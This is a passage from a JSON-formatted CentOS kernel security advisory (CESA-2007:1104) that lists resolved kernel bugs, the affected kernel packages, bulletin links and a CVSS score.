As well, symbolic links may have been displayed as actual files.\r\n\r\n* a bug which caused the cmirror write path to appear deadlocked after a\r\nsuccessful recovery, which may have caused syncing to hang, has been\r\nresolved.\r\n\r\n* a kernel panic which occurred when manually configuring LCS interfaces on\r\nthe IBM S/390 has been resolved.\r\n\r\n* when running a 32-bit binary on a 64-bit system, it was possible to\r\nmmap page at address 0 without flag MAP_FIXED set. This has been\r\nresolved in these updated packages.\r\n\r\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\r\ninterrupt counter in \"/proc/interrupts\" on systems running an AMD Opteron\r\nCPU. This caused systems running NMI Watchdog to restart at regular\r\nintervals.\r\n\r\n* a bug which caused the diskdump utility to run very slowly on devices\r\nusing Fusion MPT has been resolved.\r\n\r\nAll users are advised to upgrade to these updated packages, which resolve\r\nthese issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-December/014549.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-December/014550.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-December/014551.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-December/014553.html\n\n**Affected packages:**\nkernel\nkernel-devel\nkernel-doc\nkernel-hugemem\nkernel-hugemem-devel\nkernel-largesmp\nkernel-largesmp-devel\nkernel-smp\nkernel-smp-devel\nkernel-xenU\nkernel-xenU-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-1104.html", "modified": "2007-12-22T14:17:20", "published": "2007-12-21T16:37:34", "href": "http://lists.centos.org/pipermail/centos-announce/2007-December/014549.html", "id": "CESA-2007:1104", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}